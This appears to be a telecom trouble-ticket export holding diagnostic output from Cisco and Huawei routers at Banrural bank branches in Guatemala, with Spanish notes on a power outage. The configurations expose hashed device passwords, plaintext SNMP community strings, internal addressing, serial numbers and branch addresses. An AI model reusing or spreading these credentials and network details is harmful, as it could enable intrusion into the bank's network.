ROM: SYSTEM BOOTSTRAP, VERSION 15.0(1R)M12, RELEASE SOFTWARE (FC1)
CC_BANRURAL_GT_AGENCIA_2572 UPTIME IS 4 MINUTES
SYSTEM RETURNED TO ROM BY POWER-ON
SYSTEM RESTARTED AT 23:16:25 GUA TUE JUN 21 2022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W5
2 GIGABIT ETHERNET INTERFACES
1 ATM INTERFACE
1 TERMINAL LINE
DRAM CONFIGURATION IS 64 BITS WIDE WITH PARITY DISABLED.
255K BYTES OF NON-VOLATILE CONFIGURATION MEMORY.
250880K BYTES OF ATA SYSTEM COMPACTFLASH 0 (READ/WRITE)
LICENSE INFO:
LICENSE UDI:
-------------------------------------------------
DEVICE#	  PID			SN
-------------------------------------------------
*0  	  CISCO1941/K9          FTX153983W5
TECHNOLOGY PACKAGE LICENSE INFORMATION FOR MODULE:'C1900'
-----------------------------------------------------------------
TECHNOLOGY    TECHNOLOGY-PACKAGE           TECHNOLOGY-PACKAGE
              CURRENT       TYPE           NEXT REBOOT
------------------------------------------------------------------
IPBASE        IPBASEK9      PERMANENT      IPBASEK9
SECURITY      NONE          NONE           NONE
DATA          NONE          NONE           NONE
CONFIGURATION REGISTER IS 0X2102
CC_BANRURAL_GT_AGENCIA_2572#
CONFIGURACION DEL CPE:
SHOW RUNN
BUILDING CONFIGURATION...
CURRENT CONFIGURATION : 3237 BYTES
!
! NO CONFIGURATION CHANGE SINCE LAST RESTART
VERSION 15.1
SERVICE TIMESTAMPS DEBUG DATETIME MSEC LOCALTIME SHOW-TIMEZONE
SERVICE TIMESTAMPS LOG DATETIME MSEC LOCALTIME SHOW-TIMEZONE
SERVICE PASSWORD-ENCRYPTION
!
HOSTNAME CC_BANRURAL_GT_AGENCIA_2572
!
BOOT-START-MARKER
BOOT-END-MARKER
!
!
ENABLE SECRET 5 $1$X/J9$ODBTUNVWUVDGMB.VA4DJ5/
!
NO AAA NEW-MODEL
CLOCK TIMEZONE GUA -6 0
!
NO IPV6 CEF
IP SOURCE-ROUTE
IP CEF
!
!
!
!
!
MULTILINK BUNDLE-NAME AUTHENTICATED
!
CRYPTO PKI TOKEN DEFAULT REMOVAL TIMEOUT 0
!
!
LICENSE UDI PID CISCO1941/K9 SN FTX153983W5
!
!
USERNAME GESTIONIP SECRET 5 $1$B7OS$UC9/QYXY.6FF0TQ38UVVL0
!
!
BRIDGE IRB
!
!
!
!
INTERFACE LOOPBACK5
 DESCRIPTION MONITOREO DEL CNOC
 IP ADDRESS 10.212.120.207 255.255.255.255
!
INTERFACE EMBEDDED-SERVICE-ENGINE0/0
 NO IP ADDRESS
 SHUTDOWN
!
INTERFACE GIGABITETHERNET0/0
 DESCRIPTION LAN DEL CLIENTE
 IP ADDRESS 10.135.172.17 255.255.255.248 SECONDARY
 IP ADDRESS 10.165.172.126 255.255.255.0
 RATE-LIMIT INPUT 4096000 768000 1536000 CONFORM-ACTION TRANSMIT EXCEED-ACTION DROP
 RATE-LIMIT OUTPUT 4096000 768000 1536000 CONFORM-ACTION TRANSMIT EXCEED-ACTION DROP
 DUPLEX AUTO
 SPEED AUTO
!
INTERFACE GIGABITETHERNET0/1
 DESCRIPTION WAN PRINCIPAL/_/8901196T/_/
 BANDWIDTH 4096
 NO IP ADDRESS
 LOAD-INTERVAL 30
 DUPLEX AUTO
 SPEED AUTO
!
INTERFACE GIGABITETHERNET0/1.1
 DESCRIPTION WAN PRINCIPAL/_/8901196T/_/
 BANDWIDTH 2048
 ENCAPSULATION DOT1Q 184
 IP ADDRESS 10.15.100.124 255.255.255.248
 ARP TIMEOUT 300
!
INTERFACE ATM0/0/0
 DESCRIPTION 8901196 - BANRURAL RENAP SANTA CATARINA PINULA -&gt; DSLAM EL PUEBLITO 4 ALCATEL POTS 4-25 REG 2 PAR 76
 NO IP ADDRESS
 NO ATM ILMI-KEEPALIVE
 BRIDGE-GROUP 1
 PVC 0/32
  ENCAPSULATION AAL5SNAP
 !
!
IP FORWARD-PROTOCOL ND
!
NO IP HTTP SERVER
NO IP HTTP SECURE-SERVER
!
IP ROUTE 0.0.0.0 0.0.0.0 10.15.100.121
!
LOGGING SOURCE-INTERFACE LOOPBACK5
ACCESS-LIST 88 REMARK MONITOREO DE CLARO
ACCESS-LIST 88 PERMIT 10.255.24.144 0.0.0.7
ACCESS-LIST 88 PERMIT 190.148.15.192 0.0.0.15
!
!
SNMP-SERVER COMMUNITY MON000089D RO
SNMP-SERVER COMMUNITY NM15SNMPRO RO 88
SNMP-SERVER TRAP-SOURCE LOOPBACK5
SNMP-SERVER LOCATION 5 AVENIDA 1-04 ZONA 2 RENAP SANTA CATARINA PINULA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END
CC_BANRURAL_GT_AGENCIA_2572#
LOG DEL ROUTER CPE:
SHOW LOG
SYSLOG LOGGING: ENABLED (0 MESSAGES DROPPED, 2 MESSAGES RATE-LIMITED, 0 FLUSHES, 0 OVERRUNS, XML DISABLED, FILTERING DISABLED)
NO ACTIVE MESSAGE DISCRIMINATOR.
NO INACTIVE MESSAGE DISCRIMINATOR.
    CONSOLE LOGGING: LEVEL DEBUGGING, 16 MESSAGES LOGGED, XML DISABLED,
                     FILTERING DISABLED
    MONITOR LOGGING: LEVEL DEBUGGING, 0 MESSAGES LOGGED, XML DISABLED,
                     FILTERING DISABLED
    BUFFER LOGGING:  LEVEL DEBUGGING, 16 MESSAGES LOGGED, XML DISABLED,
                    FILTERING DISABLED
    EXCEPTION LOGGING: SIZE (4096 BYTES)
    COUNT AND TIMESTAMP LOGGING MESSAGES: DISABLED
    PERSISTENT LOGGING: DISABLED
    TRAP LOGGING: LEVEL INFORMATIONAL, 17 MESSAGE LINES LOGGED
LOG BUFFER (8192 BYTES):
JAN  2 12:00:02.359: %IOS_LICENSE_IMAGE_APPLICATION-6-LICENSE_LEVEL: MODULE NAME = C1900 NEXT REBOOT LEVEL = IPBASEK9 AND LICENSE = IPBASEK9
JUN 22 05:16:45.759: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO UP
JUN 22 05:16:45.759: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
JUN 22 05:16:45.759: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE ATM0/0/0, CHANGED STATE TO DOWN
JUN 22 05:16:46.931: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO UP
JUN 22 05:16:46.931: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
JUN 21 23:16:47.839 GUA: %SYS-6-CLOCKUPDATE: SYSTEM CLOCK HAS BEEN UPDATED FROM 05:16:47 UTC WED JUN 22 2022 TO 23:16:47 GUA TUE JUN 21 2022, CONFIGURED FROM CONSOLE BY CONSOLE.
JUN 21 23:16:47.931 GUA:
NOTE: A RANDOM SPANNING TREE BRIDGE IDENTIFIER ADDRESS OF 0000.0CC0.5D98
      HAS BEEN CHOSEN FOR BRIDGE GROUP 1 SINCE THERE IS NO MAC ADDRESS
      ASSOCIATED WITH THE SELECTED INTERFACE.
JUN 21 23:16:47.931 GUA:
      ENSURE THAT THIS ADDRESS IS UNIQUE.
JUN 21 23:16:47.947 GUA: %SYS-5-CONFIG_I: CONFIGURED FROM MEMORY BY CONSOLE
JUN 21 23:16:48.867 GUA: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE LOOPBACK5, CHANGED STATE TO UP
JUN 21 23:16:49.907 GUA: %LINK-5-CHANGED: INTERFACE EMBEDDED-SERVICE-ENGINE0/0, CHANGED STATE TO ADMINISTRATIVELY DOWN
JUN 21 23:16:50.567 GUA: %SYS-5-RESTART: SYSTEM RESTARTED --
CISCO IOS SOFTWARE, C1900 SOFTWARE (C1900-UNIVERSALK9-M), VERSION 15.1(4)M1, RELEASE SOFTWARE (FC1)
TECHNICAL SUPPORT: HTTP://WWW.CISCO.COM/TECHSUPPORT
COPYRIGHT (C) 1986-2011 BY CISCO SYSTEMS, INC.
COMPILED TUE 14-JUN-11 17:44 BY PROD_REL_TEAM
JUN 21 23:16:50.755 GUA: %SNMP-5-COLDSTART: SNMP AGENT ON HOST CC_BANRURAL_GT_AGENCIA_2572 IS UNDERGOING A COLD START
JUN 21 23:16:51.367 GUA: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE EMBEDDED-SERVICE-ENGINE0/0, CHANGED STATE TO DOWN
CC_BANRURAL_GT_AGENCIA_2572#
SHOW CLOCK
23:20:35.091 GUA TUE JUN 21 2022
CC_BANRURAL_GT_AGENCIA_2572#
TABLA ARP DEL ROUTER CPE:
SHOW ARP
PROTOCOL  ADDRESS          AGE (MIN)  HARDWARE ADDR   TYPE   INTERFACE
INTERNET  10.15.100.121           0   B443.2600.D755  ARPA   GIGABITETHERNET0/1.1
INTERNET  10.15.100.124           -   7081.05CB.8BC1  ARPA   GIGABITETHERNET0/1.1
INTERNET  10.135.172.17           -   7081.05CB.8BC0  ARPA   GIGABITETHERNET0/0
INTERNET  10.135.172.22           0   F08E.DB17.9EAA  ARPA   GIGABITETHERNET0/0
INTERNET  10.165.172.126          -   7081.05CB.8BC0  ARPA   GIGABITETHERNET0/0
CC_BANRURAL_GT_AGENCIA_2572#
INTERFACES DEL ROUTER:
SHOW INTERFACES DESCRIPTION
INTERFACE                      STATUS         PROTOCOL DESCRIPTION
EM0/0                          ADMIN DOWN     DOWN
GI0/0                          UP             UP       LAN DEL CLIENTE
GI0/1                          UP             UP       WAN PRINCIPAL/_/8901196T/_/
GI0/1.1                        UP             UP       WAN PRINCIPAL/_/8901196T/_/
AT0/0/0                        INITIALIZING   DOWN     8901196 - BANRURAL RENAP SANTA CATARINA PINULA -&gt; DSLAM EL PUEBLITO 4 ALCATEL POTS 4-25 REG 2 PAR 76
LO5                            UP             UP       MONITOREO DEL CNOC
CC_BANRURAL_GT_AGENCIA_2572#
SHOW IP INT BRIEF
INTERFACE                  IP-ADDRESS      OK? METHOD STATUS                PROTOCOL
EMBEDDED-SERVICE-ENGINE0/0 UNASSIGNED      YES NVRAM  ADMINISTRATIVELY DOWN DOWN
GIGABITETHERNET0/0         10.165.172.126  YES NVRAM  UP                    UP
GIGABITETHERNET0/1         UNASSIGNED      YES NVRAM  UP                    UP
GIGABITETHERNET0/1.1       10.15.100.124   YES NVRAM  UP                    UP
ATM0/0/0                   UNASSIGNED      YES NVRAM  INITIALIZING          DOWN
LOOPBACK5                  10.212.120.207  YES NVRAM  UP                    UP
CC_BANRURAL_GT_AGENCIA_2572#
PING HACIA ROUTER CPE:
PING -Q -C 100 -S 100 -M 5 -VPN BANRURAL 10.15.100.124
  PING 10.15.100.124: 100  DATA BYTES, PRESS CTRL_C TO BREAK
  --- 10.15.100.124 PING STATISTICS ---
    100 PACKET(S) TRANSMITTED
    100 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 1/1/1 MS
RUTA IP:
PE: 10.179.28.20
DISPLAY IP ROUTING-TABLE VPN-INSTANCE BANRURAL 10.15.100.124
ROUTE FLAGS: R - RELAY, D - DOWNLOAD TO FIB, T - TO VPN-INSTANCE, B - BLACK HOLE ROUTE
------------------------------------------------------------------------------
ROUTING TABLE : BANRURAL
SUMMARY COUNT : 1
DESTINATION/MASK    PROTO   PRE  COST        FLAGS NEXTHOP         INTERFACE
  10.15.100.124/32  DIRECT  0    0                 0.0.0.0         VLANIF184			</t>
  </si>
  <si>
    <t>SERVICIO AFECTADO POR CAIDA DE ENERGIA COMERCIAL</t>
  </si>
  <si>
    <t>F4611518</t>
  </si>
  <si>
    <t xml:space="preserve">ENALCE AFECTADO POR PROBLEMAS CON ENERGIA COMERCIAL
SE TIENE COMUNICACIÓN AL ROUTER CPE | ENLACE OPERATIVO.
SE OBSERVA UNA ALARMA DE ENERGIA RECIENTE (HACE: 0 HORAS Y 6 MINUTOS)
HUAWEI VERSATILE ROUTING PLATFORM SOFTWARE
VRP (R) SOFTWARE, VERSION 5.170 (AR120 V200R009C00SPC500)
COPYRIGHT (C) 2011-2018 HUAWEI TECH CO., LTD
HUAWEI AR129CGVW-L ROUTER UPTIME IS 0 WEEK, 0 DAY, 0 HOUR, 8 MINUTES
MPU 0(MASTER) : UPTIME IS 0 WEEK, 0 DAY, 0 HOUR, 6 MINUTES
SDRAM MEMORY SIZE    : 512     M BYTES
FLASH 0 MEMORY SIZE  : 512     M BYTES
MPU VERSION INFORMATION :
1. PCB      VERSION  : AR129CGVW-L VER.C
2. MAB      VERSION  : 0
3. BOARD    TYPE     : AR129CGVW-L
4. BOOTROM  VERSION  : 1
&lt;CC_BANRURAL_GT_AGENCIA_453&gt;
CONFIGURACION DEL CPE:
DISPLAY  CURRENT-CONFIGURATION
[V200R009C00SPC500]
#
 SYSNAME CC_BANRURAL_GT_AGENCIA_453
 HEADER LOGIN INFORMATION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LLDP ENAB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gt;E$K=}*@"N$T/K[0JT{DV2U@K"BA]QA@XH'=V,,:WOW8T&amp;FIG&gt;&amp;$
 LOCAL-USER GESTIONIP PRIVILEGE LEVEL 15
 LOCAL-USER GESTIONIP SERVICE-TYPE TELNET TERMINAL
#
WEB
 USER-SET DEFAULT
 USER-SET VIP
#
FIREWALL ZONE LOCAL
#
INTERFACE VLANIF1
 DESCRIPTION LAN DEL CIENTE
 IP ADDRESS 10.164.53.126 255.255.255.0
 IP ADDRESS 10.134.53.17 255.255.255.248 SUB
 QOS CAR INBOUND ACL 2000 CIR 5120000 CBS 962560000 PBS 1602560000 GREEN PASS YELLOW PASS RED DISCARD
 QOS CAR OUTBOUND ACL 2000 CIR 5120000 CBS 962560000 PBS 1602560000 GREEN PASS YELLOW PASS RED DISCARD
#
INTERFACE ETHERNET0/0/0
#
INTERFACE GIGABITETHERNET0/0/0
#
INTERFACE GIGABITETHERNET0/0/1
#
INTERFACE GIGABITETHERNET0/0/2
#
INTERFACE GIGABITETHERNET0/0/3
#
INTERFACE GIGABITETHERNET0/0/4
 DESCRIPTION WAN PRINCIPAL/_/8902564T/_/
 SET FLOW-STAT INTERVAL 30
 BANDWIDTH 5120
 IP ADDRESS 10.16.184.16 255.255.255.128
 OSPF NETWORK-TYPE P2MP
 OSPF TIMER DEAD 60
 OSPF ENABLE 1 AREA 0.0.0.164
#
INTERFACE GIGABITETHERNET0/0/5
 DESCRIPTION VIRTUALPORT
#
INTERFACE WLAN-BSS7
 PORT HYBRID TAGGED VLAN 1
#
INTERFACE CELLULAR0/0/0
 DESCRIPTION JAPON
 DIALER ENABLE-CIRCULAR
 DIALER-GROUP 1
 APN-PROFILE BDRALARM.CLARO
 DIALER TIMER AUTODIAL 10
 IP ADDRESS NEGOTIATE
#
INTERFACE NULL0
#
INTERFACE LOOPBACK5
 DESCRIPTION MONITOREO DEL CNOC
 IP ADDRESS 10.212.168.240 255.255.255.255
 OSPF ENABLE 1 AREA 0.0.1.185
#
INTERFACE TUNNEL0/0/0
 DESCRIPTION WAN REDUNDANTE/_/8902589T/_/
 IP ADDRESS UNNUMBERED INTERFACE LOOPBACK5
 TUNNEL-PROTOCOL GRE
 SOURCE CELLULAR0/0/0
 DESTINATION 1.1.1.100
 QOS CAR INBOUND CIR 2048 CBS 385024 PBS 641024 GREEN PASS YELLOW PASS RED DISCARD
 QOS CAR OUTBOUND CIR 2048 CBS 385024 PBS 641024 GREEN PASS YELLOW PASS RED DISCARD
 QOS CAR INBOUND ACL 2000 CIR 2048000 CBS 385024000 PBS 641024000 GREEN PASS YELLOW PASS RED DISCARD
 QOS CAR OUTBOUND ACL 2000 CIR 2048000 CBS 385024000 PBS 641024000 GREEN PASS YELLOW PASS RED DISCARD
#
DIALER-RULE
 DIALER-RULE 1 IP PERMIT
#
APN PROFILE BDRALARM.CLARO
 APN BDRALARM.CLARO
#
OSPF 1 ROUTER-ID 10.16.184.16
 IMPORT-ROUTE DIRECT
 PREFERENCE 110
 AREA 0.0.0.164
  NETWORK 10.16.184.0 0.0.0.127
  NETWORK 10.212.168.240 0.0.0.0
  NSSA
 AREA 0.0.1.185
#
CPU-DEFEND POLICY ICMP
 PACKET-TYPE ICMP RATE-LIMIT 1200
#
 CPU-DEFEND-POLICY ICMP
#
 SNMP-AGENT LOCAL-ENGINEID 800007DB0324A52CCAA643
 SNMP-AGENT COMMUNITY READ %^%#H&gt;OME7)]V9XWB-QM,:X,O9L&gt;4S!'2+V8OU@I_81S%.H."G/8ZJ"M|O'~P/C.-G6Z5M6RT-}&gt;WI)&amp;WJO)%^%# ACL 2988
 SNMP-AGENT SYS-INFO LOCATION AGE. 453. 20 CALLE 25-85 ZONA 10 2DO NIVEL C.C. LA PRADERA GUATEMALA
 SNMP-AGENT SYS-INFO VERSION V2C
 SNMP-AGENT TRAP SOURCE LOOPBACK5
 SNMP-AGENT
#
 TELNET SERVER ENABLE
#
 SET WEB LOGIN-STYLE SIMPLE
 HTTP SECURE-SERVER SSL-POLICY DEFAULT_POLICY
 HTTP SERVER ENABLE
 HTTP SECURE-SERVER ENABLE
 HTTP SERVER PERMIT INTERFACE VLANIF1
#
IP ROUTE-STATIC 0.0.0.0 0.0.0.0 TUNNEL0/0/0 PREFERENCE 220
IP ROUTE-STATIC 1.1.1.100 255.255.255.255 CELLULAR0/0/0 PREFERENCE 220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C_BANRURAL_GT_AGENCIA_453&gt;
LOG DEL ROUTER CPE:
DISPLAY LOGBUFFER
LOGGING BUFFER CONFIGURATION AND CONTENTS: ENABLED
ALLOWED MAX BUFFER SIZE: 1024
ACTUAL BUFFER SIZE: 512
CHANNEL NUMBER: 4, CHANNEL NAME: LOGBUFFER
DROPPED MESSAGES: 0
OVERWRITTEN MESSAGES: 0
CURRENT MESSAGES: 44
NOV 10 2018 04:10:59+00:00 CC_BANRURAL_GT_AGENCIA_453 %%01IFNET/4/LINK_STATE(L)[0]:THE LINE PROTOCOL IP ON THE INTERFACE TUNNEL0/0/0 HAS ENTERED THE UP STATE.
NOV 10 2018 04:10:59+00:00 CC_BANRURAL_GT_AGENCIA_453 %%01IFNET/4/LINK_STATE(L)[1]:THE LINE PROTOCOL IP ON THE INTERFACE CELLULAR0/0/0 HAS ENTERED THE UP STATE.
NOV 10 2018 04:10:53+00:00 CC_BANRURAL_GT_AGENCIA_453 %%01IFPDT/4/IF_STATE(L)[2]:INTERFACE CELLULAR0/0/0 HAS TURNED INTO UP STATE.
NOV 10 2018 04:10:32+00:00 CC_BANRURAL_GT_AGENCIA_453 %%01IFPDT/4/DRVICOUTSTR(L)[3]:3G/LTE MODULE ON CELLULAR0/0/0 HAS BEEN INITIALIZED SUCCESSFULLY.
NOV 10 2018 04:10:32+00:00 CC_BANRURAL_GT_AGENCIA_453 %%01IFPDT/4/DRVICOUTSTR(L)[4]:3G/LTE MODULE ON CELLULAR0/0/0 IS INITIALIZING, WAITING PLEASE...
NOV 10 2018 04:09:55+00:00 CC_BANRURAL_GT_AGENCIA_453 %%01OSPF/4/NBR_CHANGE_E(L)[5]:NEIGHBOR CHANGES EVENT: NEIGHBOR STATUS CHANGED. (PROCESSID=1, NEIGHBORADDRESS=10.16.184.4, NEIGHBOREVENT=LOADINGDONE, NEIGHBORPREVIOUSSTATE=LOADING, NEIGHBORCURRENTSTATE=FULL)
NOV 10 2018 04:09:55+00:00 CC_BANRURAL_GT_AGENCIA_453 %%01OSPF/4/NBR_CHANGE_E(L)[6]:NEIGHBOR CHANGES EVENT: NEIGHBOR STATUS CHANGED. (PROCESSID=1, NEIGHBORADDRESS=10.16.184.4, NEIGHBOREVENT=EXCHANGEDONE, NEIGHBORPREVIOUSSTATE=EXCHANGE, NEIGHBORCURRENTSTATE=LOADING)
NOV 10 2018 04:09:55+00:00 CC_BANRURAL_GT_AGENCIA_453 %%01OSPF/4/NBR_CHANGE_E(L)[7]:NEIGHBOR CHANGES EVENT: NEIGHBOR STATUS CHANGED. (PROCESSID=1, NEIGHBORADDRESS=10.16.184.4, NEIGHBOREVENT=NEGOTIATIONDONE, NEIGHBORPREVIOUSSTATE=EXSTART, NEIGHBORCURRENTSTATE=EXCHANGE)
NOV 10 2018 04:09:53+00:00 CC_BANRURAL_GT_AGENCIA_453 %%01OSPF/4/NBR_CHANGE_E(L)[8]:NEIGHBOR CHANGES EVENT: NEIGHBOR STATUS CHANGED. (PROCESSID=1, NEIGHBORADDRESS=10.16.184.1, NEIGHBOREVENT=LOADINGDONE, NEIGHBORPREVIOUSSTATE=LOADING, NEIGHBORCURRENTSTATE=FULL)
NOV 10 2018 04:09:53+00:00 CC_BANRURAL_GT_AGENCIA_453 %%01OSPF/4/NBR_CHANGE_E(L)[9]:NEIGHBOR CHANGES EVENT: NEIGHBOR STATUS CHANGED. (PROCESSID=1, NEIGHBORADDRESS=10.16.184.1, NEIGHBOREVENT=EXCHANGEDONE, NEIGHBORPREVIOUSSTATE=EXCHANGE, NEIGHBORCURRENTSTATE=LOADING)
NOV 10 2018 04:09:53+00:00 CC_BANRURAL_GT_AGENCIA_453 %%01OSPF/4/NBR_CHANGE_E(L)[10]:NEIGHBOR CHANGES EVENT: NEIGHBOR STATUS CHANGED. (PROCESSID=1, NEIGHBORADDRESS=10.16.184.1, NEIGHBOREVENT=NEGOTIATIONDONE, NEIGHBORPREVIOUSSTATE=EXSTART, NEIGHBORCURRENTSTATE=EXCHANGE)
NOV 10 2018 04:09:50+00:00 CC_BANRURAL_GT_AGENCIA_453 %%01RM/4/IPV4_DEFT_RT_CHG(L)[11]:IPV4 DEFAULT ROUTE IS CHANGED. (CHANGETYPE=ADD, INSTANCEID=0, PROTOCOL=OSPF, EXITIF=GIGABITETHERNET0/0/4, NEXTHOP=10.16.184.14, NEIGHBOUR=0.0.0.0, PREFERENCE=110, LABEL=NULL, METRIC=14)
NOV 10 2018 04:09:50+00:00 CC_BANRURAL_GT_AGENCIA_453 %%01OSPF/4/NBR_CHANGE_E(L)[12]:NEIGHBOR CHANGES EVENT: NEIGHBOR STATUS CHANGED. (PROCESSID=1, NEIGHBORADDRESS=10.16.184.9, NEIGHBOREVENT=LOADINGDONE, NEIGHBORPREVIOUSSTATE=LOADING, NEIGHBORCURRENTSTATE=FULL)
NOV 10 2018 04:09:50+00:00 CC_BANRURAL_GT_AGENCIA_453 %%01OSPF/4/NBR_CHANGE_E(L)[13]:NEIGHBOR CHANGES EVENT: NEIGHBOR STATUS CHANGED. (PROCESSID=1, NEIGHBORADDRESS=10.16.184.9, NEIGHBOREVENT=EXCHANGEDONE, NEIGHBORPREVIOUSSTATE=EXCHANGE, NEIGHBORCURRENTSTATE=LOADING)
NOV 10 2018 04:09:50+00:00 CC_BANRURAL_GT_AGENCIA_453 %%01OSPF/4/NBR_CHANGE_E(L)[14]:NEIGHBOR CHANGES EVENT: NEIGHBOR STATUS CHANGED. (PROCESSID=1, NEIGHBORADDRESS=10.16.184.4, NEIGHBOREVENT=BADLSREQ, NEIGHBORPREVIOUSSTATE=EXCHANGE, NEIGHBORCURRENTSTATE=EXSTART)
NOV 10 2018 04:09:50+00:00 CC_BANRURAL_GT_AGENCIA_453 %%01OSPF/4/NBR_CHANGE_E(L)[15]:NEIGHBOR CHANGES EVENT: NEIGHBOR STATUS CHANGED. (PROCESSID=1, NEIGHBORADDRESS=10.16.184.9, NEIGHBOREVENT=NEGOTIATIONDONE, NEIGHBORPREVIOUSSTATE=EXSTART, NEIGHBORCURRENTSTATE=EXCHANGE)
NOV 10 2018 04:09:50+00:00 CC_BANRURAL_GT_AGENCIA_453 %%01OSPF/4/NBR_CHANGE_E(L)[16]:NEIGHBOR CHANGES EVENT: NEIGHBOR STATUS CHANGED. (PROCESSID=1, NEIGHBORADDRESS=10.16.184.14, NEIGHBOREVENT=LOADINGDONE, NEIGHBORPREVIOUSSTATE=LOADING, NEIGHBORCURRENTSTATE=FULL)
NOV 10 2018 04:09:50+00:00 CC_BANRURAL_GT_AGENCIA_453 %%01OSPF/4/NBR_CHANGE_E(L)[17]:NEIGHBOR CHANGES EVENT: NEIGHBOR STATUS CHANGED. (PROCESSID=1, NEIGHBORADDRESS=10.16.184.14, NEIGHBOREVENT=EXCHANGEDONE, NEIGHBORPREVIOUSSTATE=EXCHANGE, NEIGHBORCURRENTSTATE=LOADING)
NOV 10 2018 04:09:50+00:00 CC_BANRURAL_GT_AGENCIA_453 %%01OSPF/4/NBR_CHANGE_E(L)[18]:NEIGHBOR CHANGES EVENT: NEIGHBOR STATUS CHANGED. (PROCESSID=1, NEIGHBORADDRESS=10.16.184.4, NEIGHBOREVENT=NEGOTIATIONDONE, NEIGHBORPREVIOUSSTATE=EXSTART, NEIGHBORCURRENTSTATE=EXCHANGE)
NOV 10 2018 04:09:50+00:00 CC_BANRURAL_GT_AGENCIA_453 %%01OSPF/4/NBR_CHANGE_E(L)[19]:NEIGHBOR CHANGES EVENT: NEIGHBOR STATUS CHANGED. (PROCESSID=1, NEIGHBORADDRESS=10.16.184.14, NEIGHBOREVENT=NEGOTIATIONDONE, NEIGHBORPREVIOUSSTATE=EXSTART, NEIGHBORCURRENTSTATE=EXCHANGE)
NOV 10 2018 04:09:50+00:00 CC_BANRURAL_GT_AGENCIA_453 %%01OSPF/4/NBR_CHANGE_E(L)[20]:NEIGHBOR CHANGES EVENT: NEIGHBOR STATUS CHANGED. (PROCESSID=1, NEIGHBORADDRESS=10.16.184.9, NEIGHBOREVENT=2WAYRECEIVED, NEIGHBORPREVIOUSSTATE=INIT, NEIGHBORCURRENTSTATE=EXSTART)
NOV 10 2018 04:09:50+00:00 CC_BANRURAL_GT_AGENCIA_453 %%01OSPF/4/NBR_CHANGE_E(L)[21]:NEIGHBOR CHANGES EVENT: NEIGHBOR STATUS CHANGED. (PROCESSID=1, NEIGHBORADDRESS=10.16.184.9, NEIGHBOREVENT=HELLORECEIVED, NEIGHBORPREVIOUSSTATE=DOWN, NEIGHBORCURRENTSTATE=INIT)
NOV 10 2018 04:09:50+00:00 CC_BANRURAL_GT_AGENCIA_453 %%01OSPF/4/NBR_CHANGE_E(L)[22]:NEIGHBOR CHANGES EVENT: NEIGHBOR STATUS CHANGED. (PROCESSID=1, NEIGHBORADDRESS=10.16.184.4, NEIGHBOREVENT=2WAYRECEIVED, NEIGHBORPREVIOUSSTATE=INIT, NEIGHBORCURRENTSTATE=EXSTART)
NOV 10 2018 04:09:50+00:00 CC_BANRURAL_GT_AGENCIA_453 %%01OSPF/4/NBR_CHANGE_E(L)[23]:NEIGHBOR CHANGES EVENT: NEIGHBOR STATUS CHANGED. (PROCESSID=1, NEIGHBORADDRESS=10.16.184.4, NEIGHBOREVENT=HELLORECEIVED, NEIGHBORPREVIOUSSTATE=DOWN, NEIGHBORCURRENTSTATE=INIT)
NOV 10 2018 04:09:50+00:00 CC_BANRURAL_GT_AGENCIA_453 %%01OSPF/4/NBR_CHANGE_E(L)[24]:NEIGHBOR CHANGES EVENT: NEIGHBOR STATUS CHANGED. (PROCESSID=1, NEIGHBORADDRESS=10.16.184.14, NEIGHBOREVENT=2WAYRECEIVED, NEIGHBORPREVIOUSSTATE=INIT, NEIGHBORCURRENTSTATE=EXSTART)
NOV 10 2018 04:09:50+00:00 CC_BANRURAL_GT_AGENCIA_453 %%01OSPF/4/NBR_CHANGE_E(L)[25]:NEIGHBOR CHANGES EVENT: NEIGHBOR STATUS CHANGED. (PROCESSID=1, NEIGHBORADDRESS=10.16.184.14, NEIGHBOREVENT=HELLORECEIVED, NEIGHBORPREVIOUSSTATE=DOWN, NEIGHBORCURRENTSTATE=INIT)
NOV 10 2018 04:09:48+00:00 CC_BANRURAL_GT_AGENCIA_453 %%01OSPF/4/NBR_CHANGE_E(L)[26]:NEIGHBOR CHANGES EVENT: NEIGHBOR STATUS CHANGED. (PROCESSID=1, NEIGHBORADDRESS=10.16.184.1, NEIGHBOREVENT=2WAYRECEIVED, NEIGHBORPREVIOUSSTATE=INIT, NEIGHBORCURRENTSTATE=EXSTART)
NOV 10 2018 04:09:48+00:00 CC_BANRURAL_GT_AGENCIA_453 %%01OSPF/4/NBR_CHANGE_E(L)[27]:NEIGHBOR CHANGES EVENT: NEIGHBOR STATUS CHANGED. (PROCESSID=1, NEIGHBORADDRESS=10.16.184.1, NEIGHBOREVENT=HELLORECEIVED, NEIGHBORPREVIOUSSTATE=DOWN, NEIGHBORCURRENTSTATE=INIT)
NOV 10 2018 04:09:24+00:00 CC_BANRURAL_GT_AGENCIA_453 %%01IFPDT/4/IF_STATE(L)[28]:INTERFACE GIGABITETHERNET0/0/0 HAS TURNED INTO UP STATE.
NOV 10 2018 04:09:22+00:00 CC_BANRURAL_GT_AGENCIA_453 %%01IFNET/4/LINK_STATE(L)[29]:THE LINE PROTOCOL IP ON THE INTERFACE GIGABITETHERNET0/0/4 HAS ENTERED THE UP STATE.
NOV 10 2018 04:09:22+00:00 CC_BANRURAL_GT_AGENCIA_453 %%01IFPDT/4/IF_STATE(L)[30]:INTERFACE GIGABITETHERNET0/0/4 HAS TURNED INTO UP STATE.
NOV 10 2018 04:09:21+00:00 CC_BANRURAL_GT_AGENCIA_453 %%01DEV/4/ENTUP(L)[31]:AR129CGVW-L BOARD[0] REGISTER SUCCESS.
NOV 10 2018 04:09:15+00:00 CC_BANRURAL_GT_AGENCIA_453 %%01IFPDT/4/IF_STATE(L)[32]:INTERFACE GIGABITETHERNET0/0/5 HAS TURNED INTO UP STATE.
NOV 10 2018 04:09:14+00:00 CC_BANRURAL_GT_AGENCIA_453 %%01IFPDT/4/IF_STATE(L)[33]:INTERFACE WLAN-RADIO0/0/1 HAS TURNED INTO UP STATE.
